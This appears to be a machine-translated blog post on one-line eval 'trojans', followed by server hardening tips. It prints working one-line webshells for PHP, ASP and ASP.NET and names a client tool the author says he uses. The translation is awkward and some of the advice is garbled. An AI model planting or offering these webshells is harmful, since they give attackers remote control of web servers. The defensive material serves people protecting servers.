Prevent eval (), request () a pattern Trojan

The server only needs a simple line of code to use this program to achieve common management functions.
　　
The code that runs on the server side is as follows:
　

The code is as follows	Copy Code
PHP: <?php @eval ($_post[' hk715 ']);? > ASP: <%eval request ("Pass")%> asp.net: <%@ Page language= "Jscript"%><%eval (request.item["hk715"], "unsafe");%>

(Note: ASP. NET to a single file or this file is also a JScript language)

Client: There are special procedures, I often use the Chinese kitchen knife.

Since it is a trojan, it can be used to invade your server, write shell, etc., but he is strong concealment, prevention is more difficult.

Here are a few precautionary measures:
1, the server to control the user rights, for a server with multiple sites, to control the rights of the site, the site should be independent of each other. IIS under the virtual Host Security configuration method, Linux, Apache easy to control, nginx words, there is no good control method. The purpose of this is to prevent cross stations. In addition to the site with the specified, you must control the Write permission.
2, if the IIS host, you can install the website purifier http://www.fengyn.cn/article.asp?id=223
3, corresponding to some of the applications under PHP, DZ,PW or some CMS. It is recommended that you Zend encrypt a configuration database file with config.php to prevent MySQL account leaks. In addition, for MySQL, we must do, the database user division, the right to minimize.
4, PHP restrictions on the risk function, this blog also has a description.
5, win under the use of mccafés to do some security settings. Linux to do a good job of system security, landing security control.

These are just a few precautions, in addition, the need for managers to regularly check the server to see if there are abnormal files or abnormal conditions